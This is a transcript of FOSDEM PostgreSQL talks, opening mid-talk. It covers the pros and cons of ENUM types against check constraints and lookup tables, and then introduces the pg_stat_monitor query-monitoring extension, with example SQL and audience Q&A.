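INSERT INTO dev_room_feedback (visitor_id, dev_room_id, created_at, feedback)
SELECT (random() * 10000)::int,
       42,
       now(),
       (ARRAY['awful','bad','average','good','great','awesome'])
           [floor(random() * 6)::int + 1]::feedback
FROM generate_series(1, 2267709);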
Now let's retrieve data; we saw how to put it in, let's get it out. We'll count how many entries we got per feedback value for one dev room. I also attend presentations in the Python dev room, a very nice community as well, so let's look at that one: select the feedback value and the count per value from dev_room_feedback, joined with the dev_rooms table because we want the feedback for the Python dev room, and group by feedback. That's the text-with-check version. If you run this with the ENUM, it's exactly the same code. It's trivial to use, it matches your way of thinking, at least mine, and feedback is a real data type that matches your business model. With the foreign key it's not hugely more complicated, but you have to rename things, because the lookup table's name column gets presented as the feedback, and you need an extra join. Joins are expensive; this is a small one, but in bigger queries joins start to cost you. So retrieving data with a foreign key and a lookup table is a bit more complicated. Again, my personal opinion, and it's my presentation so I hand out the points and you can judge whether I'm being partial: for retrieving data, text and ENUM are much easier than the foreign key. Now, what about data integrity on the reading side? Here's the query for the text-with-check version: select everything from dev_room_feedback, across all the dev rooms, where the feedback is "great". I get zero rows in 94 milliseconds. Okay, nobody thinks any dev room is great? Let's try the foreign key: again I need the extra join, so the code gets more verbose, and again zero rows, this time in 100 milliseconds. So is it really that nobody thinks the dev rooms are great? No. I made a mistake; there's a bug. I misspelled "great" in the query and didn't notice, so I would have believed nobody rated the dev rooms as great, just because of a typo. Now do exactly the same with the ENUM. Look at the first line: it's exactly the same code as for text, and the ENUM tells me this is wrong input. Because the column is of type feedback, not just text, the value is validated when I use it in the query, and I get the error in less than a millisecond. The other two queries scan the table or use indexes and then report zero rows, so their cost depends on the size of the table; this one depends only on the size of the ENUM, so it's essentially constant time to tell me the input is wrong. You may say: I'm a good developer, I'd never make that mistake while typing. Fine, I understand and I agree. But you'll have to open this database to other applications and other developers, or expose it through an API, and they will make mistakes. So think about it: this is data integrity on retrieval as well. The constraint guarantees we insert valid data; the ENUM also guarantees we query with valid values.
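The retrieval queries, approximately as described (the misspelling in the last example is illustrative):

-- Text or ENUM column: the same query works for both.
SELECT f.feedback, count(*)
FROM dev_room_feedback f
JOIN dev_rooms d ON d.dev_room_id = f.dev_room_id
WHERE d.name = 'Python'
GROUP BY f.feedback;

-- The foreign-key variant needs an extra join and a rename:
SELECT fb.name AS feedback, count(*)
FROM dev_room_feedback f
JOIN dev_rooms d  ON d.dev_room_id = f.dev_room_id
JOIN feedbacks fb ON fb.id = f.feedback_id
WHERE d.name = 'Python'
GROUP BY fb.name;

-- Data integrity on retrieval: with text this silently returns zero rows;
-- with the ENUM column it fails immediately with
-- "invalid input value for enum feedback".
SELECT * FROM dev_room_feedback WHERE feedback = 'graet';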
I think that deserves another point, and it's very fast as well: it fails immediately, it errors fast. So in the approach comparison, text keeps its earlier point, and ENUM gets an extra one for data integrity. And let me be clear: data integrity is very important; I hope I've convinced you of that. Let's continue. So why is normalization relevant? So far normalization with a foreign key hasn't really paid off compared to ENUM, so why do we use it? Here's the point: updates. Let's say "average" is an ancient word nobody uses any more. You ask how the dev room was and people say "meh". I still say "average", but people want to say "meh". So we update dev_room_feedback and set everything that was "average" to "meh". With the check constraint this is not a valid query: the constraint guarantees that "meh" is not a valid value yet. What you actually need is a full transaction that first drops the constraint, so "meh" can be introduced as if there were no constraint at all, and then re-adds the constraint, which re-checks the entire table against the new array with "meh" instead of "average". And imagine doing that for every table: talk_feedback, speaker_feedback and so on. Very costly. Terrible. That's why normalization is good: with the lookup table, the update is just changing "average" to "meh" in the feedbacks table. Is that all the code? Yes, there's nothing else. That's why normalization is good. So for updates: text with a check constraint is terrible, three X's, we don't like it at all; this is where that approach falls apart. The foreign key is good and fast; this is exactly why you need normalization. And what about ENUMs? This is the moment you might expect them to stop being so good, but here's how you do the update: you alter the type, it's just DDL, and rename the value "average" to "meh". Is that enough? Yes, that's everything you need. So ENUM gets a check there too: as good, as fast and as efficient as the foreign key. Now let's say we want to delete a value. "Awesome": what even is that? You ask somebody what they had for lunch, they say a burger and a lager, and the answer is "awesome". That's not awesome, especially if it's a lager. People say "awesome" too quickly, so let's say we don't want "awesome" any more, and anyone who said "awesome" gets mapped to "great", the closest value. With the check constraint we need a new array again; you know the story, very expensive, not great, but there's nothing else you can do. Is it better with normalization? You'd say DELETE FROM feedbacks WHERE name = 'awesome' should be enough, but when you run it, Postgres says: sorry, first you need to clean up all your tables. You still have to do those updates in every referencing table before you can remove the value from the lookup table.
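The update paths, roughly as shown on the slides (constraint and type names follow the earlier sketches):

-- Text + check constraint: the whole dance, and it has to be repeated per table.
BEGIN;
ALTER TABLE dev_room_feedback DROP CONSTRAINT valid_feedback;
UPDATE dev_room_feedback SET feedback = 'meh' WHERE feedback = 'average';
ALTER TABLE dev_room_feedback
    ADD CONSTRAINT valid_feedback CHECK
        (feedback = ANY (ARRAY['awful','bad','meh','good','great','awesome']));
COMMIT;

-- Lookup table: one statement.
UPDATE feedbacks SET name = 'meh' WHERE name = 'average';

-- ENUM: one statement (PostgreSQL 10 and later).
ALTER TYPE feedback RENAME VALUE 'average' TO 'meh';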
So even with normalized data it is a lot of work to remove a value: the database complains that there are still rows in all the other tables pointing at that row in the lookup table. And for ENUM, unfortunately, there is no ALTER TYPE ... DROP VALUE; that doesn't exist, so strike that. There are ways around it: you create a different type without the value, you still go through all the cleanup in all the tables, and then you change the column type. I won't go into the details, but I'll show something similar with alternative types in a moment. So deleting a value is not great for anyone. It's possible, but that's why I put warnings there; nobody scores well here, it's a fair draw. Now, an extra feature. We've seen insert, retrieve, update and delete; here's something extra that ENUM has. It might not be that important, but I think it's cool: ENUMs are ordered. When you create the type, you give the values in an order, from awful up to awesome. So you can say, for instance: give me all the dev rooms with feedback better than good, that is, great and awesome, and how many times that happened, with a join to get the dev room names. If you try that with text it doesn't work, because text gives you alphabetical order: "great" sorts after "good", but "awesome" sorts before it, so awesome wouldn't be included. That makes sense for text. But with enumerated types it works; you can try it. Now suppose I don't always want the same order. Say I think people say "awesome" too quickly, so I create another type, feedback_alt, with whatever order I want: the first three stay the same, but "awesome" goes right after "meh" and before "good", so that the really top value is "great". Then my query changes: instead of comparing the feedback column directly, I cast it, feedback to text and from text to the alternative type, and compare in that order. I could define a direct cast to avoid the text intermediate step, but this way it's clear: I'm not hiding any code, this is exactly what you need for an alternative order. So it's strongly typed, with a kind of dynamic ordering; I think that's powerful. Anyway, you can also add values to your ENUM at a specific position. Earlier we renamed "average" to "meh"; now let's add new things. Say somebody wasn't "bad", just "unlucky", so we add "unlucky" before "meh", and we add a "the presentation was fine" value after "meh". You can do this directly on the type, and that's all the code you need. And if you want to know what's going on in your type, you can always describe it with \dT+, capital T with a plus, and it gives you all the values in order.
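The ordering examples, roughly as described (the added value names are approximate):

-- Works with the ENUM column; with text this comparison would use alphabetical order.
SELECT d.name, count(*)
FROM dev_room_feedback f
JOIN dev_rooms d ON d.dev_room_id = f.dev_room_id
WHERE f.feedback > 'good'
GROUP BY d.name;

-- An alternative ordering via a second type and a cast through text:
CREATE TYPE feedback_alt AS ENUM
    ('awful', 'bad', 'meh', 'awesome', 'good', 'great');

SELECT d.name, count(*)
FROM dev_room_feedback f
JOIN dev_rooms d ON d.dev_room_id = f.dev_room_id
WHERE f.feedback::text::feedback_alt > 'good'
GROUP BY d.name;

-- Adding values at a given position, and inspecting the type in psql:
ALTER TYPE feedback ADD VALUE 'unlucky' BEFORE 'meh';
ALTER TYPE feedback ADD VALUE 'fine' AFTER 'meh';
\dT+ feedback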
You can also investigate your enumerated types, not numeric, enumerated, using the catalog views pg_enum and pg_type. Remember this is a type, so the type name is feedback, and you order by the enum sort order. That shows you a bit of the implementation: you get the labels, and the sort order is stored as real numbers, which is how Postgres can put new values in between existing ones. So it works; there you have the ENUM. Now you could say: I can get the same ordering from a lookup table, just use the order of the IDs plus a couple of joins. But then if you want to add values in between, or use that dynamic ordering, plain IDs don't work. Okay, so use a rank column, and maybe alternative rankings. So here I have a rank, but it can't be an integer, because new values may need to go in between, so either you use real numbers or you reorder everything, which is complicated. Say you add "unlucky" and "fine" before and after "meh": they get ranks 2.5 and 3.5, and now it looks a bit odd, because ordering by rank gives a different sequence than ordering by ID. I'm being a bit picky because I want to promote ENUM, but fine: order by rank and it works. You just need an extra column in your lookup table purely for ordering. Now back to the "better than good" query: this was the first query I showed you with the ENUM, and here it is with a lookup table and a ranking. You add the extra join, plus an inner select just to fetch the rank of "good" so you can compare against it. It's a short example and it can get more complicated, which is exactly what I wanted to show: ENUM is straightforward. So in the approach comparison for ordering: with text plus check you can't get a meaningful order, only alphabetical, which has nothing to do with the real order; with a foreign key you can, but you need an extra column and some extra machinery; with ENUM you get it for free. So you might want to use it. Okay, closing words. Now you know ENUM in Postgres a bit better, and if you're convinced and you already have your values stored as text with a check on an array, how do you move to ENUM? You just create the ENUM type and cast the column from text to the new type, and it works. What I feel is that when you're modeling your database, ENUM matches your way of thinking better. I can create a type called feedback; I can have countries, which don't vary that much; I can have types of beer, because you don't discover a new type of beer that often — there are variations, but there's a core set. It matches the way you think about your application: when you read the table definition you see "of course, this is a beer type", "oh, this is feedback", instead of text or integer that could mean anything. And as you saw, it's very efficiently normalized: a lot is implemented for you, and you don't need to go through difficult changes to modify the values. Except for delete, of course.
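For reference, the catalog query, the lookup-table workaround and the text-to-ENUM migration just mentioned look roughly like this (rank values and constraint names are illustrative):

-- Inspect an ENUM through the catalogs:
SELECT e.enumlabel, e.enumsortorder
FROM pg_enum e
JOIN pg_type t ON t.oid = e.enumtypid
WHERE t.typname = 'feedback'
ORDER BY e.enumsortorder;

-- The lookup-table alternative needs its own ordering column plus an inner select:
ALTER TABLE feedbacks ADD COLUMN rank real;
UPDATE feedbacks SET rank = id;     -- values added in between would get e.g. 2.5, 3.5
SELECT d.name, count(*)
FROM dev_room_feedback f
JOIN dev_rooms d  ON d.dev_room_id = f.dev_room_id
JOIN feedbacks fb ON fb.id = f.feedback_id
WHERE fb.rank > (SELECT rank FROM feedbacks WHERE name = 'good')
GROUP BY d.name;

-- Migrating an existing text column to the ENUM type
-- (drop the old check constraint first, and make sure all stored values are valid labels):
ALTER TABLE dev_room_feedback DROP CONSTRAINT IF EXISTS valid_feedback;
ALTER TABLE dev_room_feedback
    ALTER COLUMN feedback TYPE feedback USING feedback::feedback;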
I understand delete is a draw, but it isn't easy with the other approaches either. And remember that this presentation is specific to PostgreSQL: ENUM is not part of the SQL standard, so it's not implemented in all databases, and the databases that do implement it don't do it exactly the same way as PostgreSQL. This is the PostgreSQL dev room at FOSDEM, and I hope you can see the value of using ENUM if you're using PostgreSQL. Contact me, ask me questions; I'll be glad to answer on Twitter as well if you want to know more about ENUMs. I think that's all from me. Thank you very much. Unfortunately we can't go for a beer after this presentation, because it's early in the morning and we're not in person, but next time we see each other we can have a chat and a beer. Thank you very much. Bye. I recorded that in the evening, but it's okay. I think we can start at any moment now. I see nothing happening. So, okay, we are online. Gio, would you like to start? Fantastic. Yes, that was a lovely talk; I now know so much about ENUM, and we've got quite some questions. I'll start with the very first one: when should I not use ENUM? Thanks, Giorgio. As I explained, one of the main benefits of ENUM is data integrity, and as somebody said, it's essentially a built-in, efficiently implemented normalized lookup table. Updating values is very cheap, and you can even add values in between for reordering. So the main use case is data integrity for fairly static sets of values. When should you not use ENUM? When your values change a lot, when values are going to be deleted, or when they need to be reordered in different ways, although I showed some tricks with casts for alternative orderings, so you could keep a catalog of orderings. And deleting values is not only a problem for ENUM: with a lookup table, the value you want to delete is referenced from all the tables too, so you still have to clean it up. If your values are mostly static and you want data integrity, that's the best use case; if you don't need that, use text or something more flexible. Okay, the next question is from Alit Sekuharcik: I remember from many years back that changing an ENUM caused a huge lock; is that still the case? Renaming a value is usually what you want, and the value itself is not stored in the tables, only a four-byte reference to the ENUM. So when you update the values, the tables are not rewritten; if queries that depend on that value are running at that moment, there may be some locking, but in terms of cost, changing a value is the same as updating a lookup table. Right. The next question is from Publux: is it still impossible to change the ENUM order, except by updating the system catalogs? Well, you can add values in between.
But to really change the order, the only way would be to create a parallel ENUM with the same values in a different order and then do the cast, and if you want to make that permanent you'd have to change the column type, which is going to be a bit expensive. So that's one of the cases where you don't want an ENUM: when you have to change the order too often.
The ENUM data type is extremely good for defining constraints on column values, and it adds descriptiveness to your database schema. In this talk you'll learn the advantages and disadvantages of the ENUM data type, and how to use it in your database schema design. The enumerated data type, ENUM, is rarely considered in the design of database schemas. This is either because ENUM is unknown, or because one or two drawbacks have created a wrong impression of it, hiding its major advantages. I use ENUM because I consider it extremely good for defining constraints on column values, providing a very descriptive design that matches the business logic. This presentation attempts to vindicate the value of ENUM, the underdog of the data types. In this talk you'll learn: - Advantages and disadvantages of the ENUM type - How to use ENUM in your database schema design - Using ordering of ENUM values - Casting ENUM data types - Manipulating ENUM data types
10.5446/53276 (DOI)
Hi, okay. Hello everybody. Today: pg_stat_monitor, the new way to analyze query performance in PostgreSQL. My name is Ibrar, and welcome to the FOSDEM platform. I'll introduce myself, then Peter will introduce himself, and then we'll go through the slides. So, my name is Ibrar Ahmed. I have been in the software industry since 1998, I've been working with PostgreSQL since 2006, I've been at multiple PostgreSQL companies, and nowadays I work at Percona, for the last two and a half years. I'm also a PhD candidate, completing my PhD. Over to you, Peter. Hey, I'm Peter, and I'm helping Ibrar with his presentation. I also happen to be CEO of Percona and a database performance geek. I don't know as much about Postgres; I'd say Ibrar has forgotten more about Postgres than I will ever know. But I've been in the database industry for a long time, and I thought it would be good to share, at a high level, why we are working on this extension and on a new way of performance monitoring for Postgres. Next slide. That's the agenda, and there's a section of mine. At Percona I've been working on open source database performance problems for over 15 years, and a few years before that at MySQL AB and other companies. One thing I learned in that time is that modern databases are very, very powerful: Postgres, or really any modern database, can take a lot of beating and handle very significant workloads if things are done right. But if you write bad queries, even a few of them can bring down an otherwise very capable database. From a user standpoint, people often don't even know they have such queries. And if they do, and say "the database is slow, I probably have a bad query somewhere", they may not know where those queries come from, especially if one database serves many users, many developers, many applications. And finally, it's often not easy to know what to do with a bad query once you've spotted it. This is the problem we're looking to solve, and the extension we're going to talk about is a foundational component of such a solution. Next slide. Now, if you think about query data, there are a couple of approaches to sourcing it. At a high level, one is sampling: say, a hundred times a second, look at the whole state of Postgres, see what queries are running, whether they're on CPU or waiting on disk, and so on, and collect that data. The good thing is that the overhead is bounded, essentially by the number of processes and the sample rate, but you get limited accuracy, and you also get measurement artifacts: your sampling process only gets scheduled on a CPU core when that core becomes available, that is, when the query that was running there has freed it, so you tend to see more queries in waiting states, or completed, than the system actually has.
Those measurement artifacts especially escalate when the system comes under extreme load, which is frankly the worst case, because that's exactly when you want the data most. The other approach is event counting: when a query runs, we increment counters, how many rows it processed and other statistics, and either store that data somewhere or write it out to a log file. Here the overhead can be higher, but you can get very good accuracy. In pg_stat_monitor we use the event counting approach, and as Ibrar will show you, we're able to do that with typically very limited performance overhead. Okay. So after we capture those events, what exactly do we do with them? One approach is to spit them out into the log and have consumers, like a monitoring application, parse the logs. That gets complicated, especially in the cloud: on something like Amazon RDS you may not have the option to run agents on the database host itself. Another approach is to have the database maintain a log of every query it runs in some table. That gets expensive: for every select by primary key you also have to do an insert into a log table. That sounds heavy, because it is. The third approach says: we're not going to store and expose information about every single query, but we'll capture enough statistics and summaries to give you the most important information about your workload. That is the approach pg_stat_monitor takes. Next slide. Finally, let me highlight some of the things we do in pg_stat_monitor, and why they matter. One: we go the extra mile to make sure you don't just get $1, $2 placeholders, but the actual parameter values in the query where possible. Why is that important? Because then you can run EXPLAIN on the query you see running slow, and you can actually play with the query, modify it, maybe find a better way to run it while checking that it returns the same results, which is much harder if you only have placeholders and have to figure out what to substitute for them. We also have time bucketing, which gives us high-fidelity statistics and much better tolerance of poor network quality. That may sound a bit complicated, so think of this situation: your monitoring system is relatively far away from the database and samples the data, say, every five seconds. Because of network jitter, one sample may actually cover four seconds and another six, which reduces the quality of your data and makes it harder to separate signal from noise. So we do the time bucketing inside the extension instead: the data always corresponds to exact intervals, and any change in the workload between those intervals is clearly visible.
We also provide information about the client IP, the source host that sent the query, which is important for security analysis and also helps you spot workloads that shouldn't be running at all. In so many cases I've seen people ask "where on earth does this query come from?", and it turns out to be an old version of an application that should have been decommissioned long ago. That can be hard to find, but the client IP gives you a good answer quickly. We also capture failed queries, queries that never completed. I think they're still important, because in many cases a query fails precisely because it ran for a long time: say it waited on a lock for twenty seconds and then failed. You probably want to know about that, because it impacted the system and the end user. We also capture the relations a query touches, which is wonderful because you can easily find all the queries touching a given relation. You might say "can't I just parse the query text manually?" That's not a good idea and it won't cover all cases: think about stored procedures and views, where you can't extract the relations just by parsing the query. And finally, I want to highlight the response time distribution: just getting the average query execution time doesn't tell you much. You get a lot more insight from the response time distribution, and your users don't care about the average response time anyway; they care that their queries don't run slow, and that's much better understood with a histogram. Next slide. Well, that was my little introduction. Ibrar, back to you. So, welcome again. Here are some of the statistics and monitoring tools; I listed three or four on this slide. One of the main and most basic ones is pg_stat_statements, which ships as part of the PostgreSQL distribution. We took pg_stat_statements as a base, enhanced it, added features on top, and made a new monitoring tool for Postgres called pg_stat_monitor, a PostgreSQL query performance monitoring tool. It's a new tool based on pg_stat_statements: it has almost every feature of pg_stat_statements, plus many more. Here's a brief summary of what pg_stat_monitor has that pg_stat_statements does not: the bucket concept (pg_stat_statements has no buckets; I'll explain in a moment what the buckets are), the client IP, the application name, the relations, the command type, the error code, the error message, the SQLSTATE. All of these are in pg_stat_monitor but not in pg_stat_statements, and that's only a brief summary. pg_stat_monitor is a standard PostgreSQL extension, and by "standard" I mean that the way you download, install and configure it is the same as for any other PostgreSQL extension.
It's truly open source: you can go to the GitHub page, download the code or the releases, compile it and use it. If you don't want to compile, just download the Debian or RPM packages from the Percona repositories. And two or three days ago I also released it on PGXN, so you can install it with the PGXN client: pgxn install pg_stat_monitor installs the latest version on your machine. Once installed, you have to configure it. As I said, it's a standard PostgreSQL extension, so the steps are almost the same as for pg_stat_statements, only with a different name: in postgresql.conf you add pg_stat_monitor to shared_preload_libraries, or you use the ALTER SYSTEM command. Don't forget to restart; you have to restart PostgreSQL before using this extension. After the restart it starts collecting information regardless of whether you've created the extension, but to actually extract the statistics and monitoring information, you have to create the extension, and then you can query it. There are two version numbers, so don't get confused. One is the SQL version, the extension version, usually 1.0; it only changes when there is a drastic change in the extension's SQL file, and we rarely change much there. The other is the build version, the actual version of pg_stat_monitor, and there's a function to check it: pg_stat_monitor_version(). Right now that's 0.7.2; it's not GA yet, so it's not 1.0, but it will be. There are also settings, GUC variables, to configure pg_stat_monitor, and we provide a view for them: select from pg_stat_monitor_settings and you see the variable name, the current value, the default value, the description, the minimum and maximum values, and whether a restart of PostgreSQL is required. It gives you the whole picture in one view. On this slide, for example: the maximum number of statements tracked by pg_stat_monitor. The default is 5000, you can see the description, the minimum and maximum values, and yes, a restart is required if you change it.
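A minimal setup sketch following the steps just described; the function and view names are as given in the talk, and details can differ between pg_stat_monitor versions:

-- In postgresql.conf:  shared_preload_libraries = 'pg_stat_monitor'
-- or from SQL, followed by a server restart:
ALTER SYSTEM SET shared_preload_libraries = 'pg_stat_monitor';

-- After the restart, in the database where you want to read the statistics:
CREATE EXTENSION pg_stat_monitor;

-- Check the build version and browse the configuration:
SELECT pg_stat_monitor_version();
SELECT * FROM pg_stat_monitor_settings;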
Now, query monitoring. There are two ways to see the query text in pg_stat_monitor. The default is the normalized form: you set pg_stat_monitor's pgsm_normalized_query parameter to true and run a query like SELECT a FROM foo WHERE a = 10; when you then query the pg_stat_monitor view, you see a placeholder instead of 10, WHERE a = $1, because PostgreSQL replaces the constant with $1. But sometimes your queries are not running fast and you want to see the actual values. pg_stat_statements doesn't provide that, but pg_stat_monitor does: set the normalized-query parameter to false, execute the query, and it shows the exact value, a = 10, instead of the placeholder. Now you can copy that statement, run it yourself, see what's happening and which values take longer. So you have the choice: placeholders or actual values. Next, time bucketing. We divide the whole set of monitoring information into multiple buckets, and it's configurable; here I've configured five buckets, so on the right you see bucket zero through bucket four. We store the bucket start time, and each bucket covers a fixed interval: with a 30-second bucket time, bucket zero starts at 9:30:00, the next bucket 30 seconds later, and so on. We aggregate the information within each bucket; when its time is over, the next bucket starts, and after the last one, bucket zero gets recycled. So you have until the first bucket is recycled to collect the information from all the buckets, and both the length of a bucket and the number of buckets are under your control. Besides logging successful queries, you also want to monitor queries that fail. Sometimes you don't care about all the queries that run successfully; you care about the query that keeps failing, and why. For that we record the level, which can be error, warning, info, whatever; the SQL state code; the actual query; and the error message. For example, SELECT * FROM pg_foo, where pg_foo doesn't exist, gives "relation pg_foo does not exist", and SELECT 1/0 gives the obvious division-by-zero error. You can also look at the calls column to count how many times an error occurred: if one error happens a hundred or a thousand times, that's the problem you go and fix.
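A sketch of the two query-text modes, the bucket settings and the error columns, using the parameter and column names as described in the talk; exact names can vary between pg_stat_monitor releases:

-- Normalized query text (placeholders) vs. actual parameter values:
SET pg_stat_monitor.pgsm_normalized_query = true;   -- shows WHERE a = $1
SET pg_stat_monitor.pgsm_normalized_query = false;  -- shows WHERE a = 10

-- Bucket configuration: how many buckets, and how long each one lasts
-- (shown with ALTER SYSTEM; these typically require a restart):
ALTER SYSTEM SET pg_stat_monitor.pgsm_max_buckets = 5;
ALTER SYSTEM SET pg_stat_monitor.pgsm_bucket_time = 30;   -- seconds

-- Failed queries are recorded alongside successful ones
-- (assuming elevel = 0 means "no error"):
SELECT bucket, query, elevel, sqlcode, message, calls
FROM pg_stat_monitor
WHERE elevel > 0;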
So like here, select static from bar and just doing a table bar. So it's just showing the table bar is used. So second second one, I'm just doing foo comma bar. So you can see the two tables you can see here. Suppose you want to you have a view, which is name is just a view and you want to query that view. So it will not only extract the name of the view, but also it will extract the actual table used in that view. Then you can check that this query touches how many tables. So you can you can configure your query much better than that you can read your query, you feel some problem in that. So you have a very clear picture how many table are being touched by your queries and how much time it is taking. That's really useful information for you. So the query histogram. What is a query histogram, the query histogram, like if you want to query, and you want to see how many time your query is running between less than one millisecond. So sometime you want to see that how many time your query has run in less than one millisecond and how many time your query runs one millisecond and two millisecond, like in two millisecond and three millisecond and greater than three millisecond. It can be configured. So you can configure how many. This buckets you want and how long it is like here I have only three or four, less than one, less than, less than one, one or two, two and three and greater than three, it's just four. So you can configure how many you want to have and I have that in one millisecond bucket. So it is counting that this query select static from PG bench accounts runs five time less than one millisecond. It's from zero to one millisecond. It runs five times and this query runs one millisecond to two millisecond, two times. And this query runs nine times and taking more than three milliseconds. It's just showing you that five and this query is running how many time you have a total of 16, but you want to see your curious how many time this query runs in which bucket one millisecond, two millisecond, three or taking more than three millisecond. So you have a clear idea on that. So like here you have a different option here. So I'm just planning to write some curious here. Like this is just an example to elaborate that how curie timing histogram will work. I will provide a histogram and just in the future version you can see a function histogram where you can provide the curie ID here and you can provide the minimum value and maximum value of that and how many type, how many so you have to configure that how many histogram buckets you want to have. So it will show you the bucket, you will show you the range and then the frequency of that query and then it will show you the frequency is that here the five time it runs zero to one millisecond, then it have a five static here and run three static here. If you see two to three, it's 10 static and it has five to six that mean 500 times so we can't have a 500 static here. We have an hash, which is one is equal and 200 and then we have multiplied it by five, then it's 500. And we have 1000 1000 mean we have a dollar sign which is equal to the 1000, then it's just a curie, you can configure it, but what we will provide you for that we provide you the histogram function. So in the next version, you will see that how you can see that information information is already in a PG stack monitor. This is the view how you can see that information. So we have to provide a better view to analyze and view your curie. 
Now, planning statistics. PostgreSQL 13 added a new feature, planning statistics, to pg_stat_statements, and pg_stat_monitor inherits it. If you're running PostgreSQL 13 with the matching pg_stat_monitor build, you get a plans column: you can see, for example, an INSERT that was planned 100 times and called 100 times, a COPY that was never planned and called twice, and another query planned 10 times and called 10 times. There are more columns as well, things like CPU user time and CPU system time, which are not in pg_stat_statements but are in the pg_stat_monitor view. Here are some performance numbers. I benchmarked on a 64-core machine with a lot of memory; it's not a complete, detailed benchmark, but I used roughly 1.6 GB, 16 GB and 160 GB databases and measured TPS. With vanilla PostgreSQL, no pg_stat_statements and no pg_stat_monitor; with pg_stat_statements installed, a very slight performance degradation; and with pg_stat_monitor, almost exactly the same, in some cases even better than pg_stat_statements. One major reason is that we don't touch the disk: pg_stat_statements stores the actual query texts on disk and reads them back from there, while pg_stat_monitor stores the queries in shared memory, and only hits the disk if the shared memory isn't big enough. So if you size your shared memory properly, you don't hit the disk and you get better performance; it's up to you and your machine. PMM, Percona Monitoring and Management, is integrated with pg_stat_monitor, so you can download it and use the two together; it's already integrated. For feedback, we have a Jira project at jira.percona.com, project PG: go there and log your issues, and if you have a feature request, file it there as well. And if you're a developer and want to contribute, just create a pull request; we'll be happy to review it and integrate it into pg_stat_monitor. So, thank you, that's all from my side. Peter? Yes, well, thank you. Ibrar, that was a very good talk, but you knew that already. And thank you everyone for attending; we'll be happy to answer questions.
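A quick sketch of pulling the planning counters and the CPU-time columns mentioned above from the view; the column names are the ones shown on the slides and may vary slightly by release:

SELECT query, plans, calls, cpu_user_time, cpu_sys_time
FROM pg_stat_monitor
ORDER BY calls DESC
LIMIT 10;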
Let us know when we start. I'll give you a shout and then join you. So, we're live. Okay, now we have some time to answer your questions. Thank you very much for the talk, Peter and Ibrar, it was quite interesting, and there are a lot of questions in the chat, as we can see. Unfortunately Ibrar is having some trouble talking, because he got tired from all the discussion before, but I guess you can speak for him, Peter, since you've been working closely together on this project. The question that came up the most was about the similarity to pg_stat_statements: what are the real differences in terms of code, and why not ship this as an evolution of pg_stat_statements? Why two different projects? Of course. When we embarked on this project, we really wanted to see what we could do without worrying about compatibility with anything existing, in terms of data formats or approaches. We took pg_stat_statements as a baseline, but as you saw in the presentation, pg_stat_monitor uses a different data model: time-based bucketing instead of one global summary. If we simply replaced pg_stat_statements, applications that have relied on it for years would break. Right now we're experimenting with different approaches as we get closer to the GA release; after that we'll obviously seek more community buy-in, and if this were to become the next version of pg_stat_statements we'd be very happy with that. It doesn't have to stay a separate project, but that's not our choice to make alone. Right, and it also allows you to explore the possibilities a bit further. If you look at other projects, like pglogical, that eventually fed work back into core, being a separate project first let them explore more, so there are different ways for the two communities to collaborate. There are some more specific questions: Nick was asking about the IP addresses stored in the table. Yes: the extension itself looks very, very promising, good work, but I didn't see a slide showing how the IP addresses are stored with the statement, as you mentioned initially. How are they stored, and can you disable that? IP addresses are considered personal data, at least in my jurisdiction, so it's always a bit tricky to store them alongside other information. Can you just disable it if you want to? We can take that as a feature request. To a large extent it shouldn't be a problem: we already do something similar for query parameters. Some people really like having query examples they can copy straight into a console or into EXPLAIN, and others say "my goodness, I may have credit card numbers in those parameters and I don't want them stored", so having an option to neutralize the IP, to store a null or a placeholder instead, shouldn't be a problem. It's not there yet, but it shouldn't be hard. And something to keep in mind: in many environments you'll see the load balancer's IP there instead of your user's IP.
Right, and that's kind of a third point about the IP: I had that concern too, but in this case the IP is typically not the end user's, the one you'd be most worried about. In many cases it's your application, running inside your own environment, so it's your own, typically private, IP, and it shouldn't be subject to the same concern. Yes, but for some use cases an option to collapse the IPs, or not store them at all, would still be helpful. Indeed. We were also looking at the chat: there were several comments rather than questions, saying the histograms are really nice and the bucketing is very useful, and asking about the PMM integration shown at the very end. Is PMM also open source, also available? Oh yes, PMM is also open source, and you can use it with regular Postgres; you don't have to run any other Percona stuff, you can just use the monitoring features. Right. Another question, I don't know whether it's an interesting one or not: Windows support, any plans? Well, that's a fair question, especially for an open source project. Frankly, at Percona we don't focus on Windows for our software, and I don't see it being a priority for pg_stat_monitor, but we would very much love it if somebody wanted to submit a patch, whatever is needed to validate that it builds on Windows. We'd love to see more contributors. Okay. There was also a question about whether it's available on PGXN or when it will be; I know you answered that in the chat already. Yes, it's already available. Good, excellent. Now for something more about development and about how the project makes progress. One question is about contributing this to the PostgreSQL community itself. Right now you have the freedom to do whatever you want with pg_stat_monitor; if you make it part of the Postgres community, you have to get involved in all the discussions and the mailing lists, so that it becomes the community's project rather than your own. Have you had interactions around that already? Do you have experience there, or is that something your team still has to discover? Well, the lead on this project at Percona is Ibrar, and Ibrar has spent more than a decade in the Postgres community across a number of companies; he's been involved in a number of foreign data wrappers before this project. Unfortunately he can't speak for himself on this question right now, since he's the one handling it, but I know he has already reached out to a number of people and had feedback, and there are already folks from other companies starting to contribute to this project. So we are working on this and looking to do it even better. One thing in this case, and here I'll put my CEO hat on, is what I told our team: we have two different goals here. Obviously we have a Percona distribution for PostgreSQL, we have PMM, and we invest in this project.
So part of the goal is that it works with PMM and makes our Percona distribution for PostgreSQL more awesome. But at the same time, pg_stat_monitor itself is a community project: we're looking to serve the needs of the Postgres community overall, beyond Percona's interests. That goes both for what we do, like making it available through other channels, and for which features we build or accept from contributors. It should not just serve Percona's needs. Right, exactly. And it's not only that pg_stat_monitor might feed back into pg_stat_statements; it's also that people from the community can contribute to pg_stat_monitor itself, as its own project. Absolutely, and that's the main point at this stage. As I mentioned, we want to see how far we can take this when we're not limited by any previous working conventions. We really looked at a lot of existing extensions, pgsentinel and the others you'd probably list, to see what we can borrow and how to connect those things into a sort of uniform per-query view. That's the goal of the whole project. Excellent. Good. Thank you very much. Nick, do you have anything else? Right now I'm busy chatting with Simon; I think he has a question and is trying to get into our room, I'm not sure. Yes, I passed Simon's questions on a few minutes ago, so if there's another one from him that would be useful too. Let's see. Otherwise, for the people who wanted to hear Ibrar in the question-and-answer section: we have an interview with Peter and Ibrar that we're going to publish this weekend, maybe tomorrow, where we talk not only about this talk but about other things as well. It's a short interview, so it won't take much of your time, and you can hear Ibrar there. Okay. So if there are any other questions, you can join this room after the time slot of this talk: a link will appear in the chat of the PostgreSQL dev room, and Peter and Ibrar will stay here, I guess, in case somebody wants to discuss things with them, not just the functionality of pg_stat_monitor but also how to contribute to the project. That would be interesting. The link becomes public after the 15 minutes, probably more like 14 and a half. 14 and a half, yes, exactly; Nick is 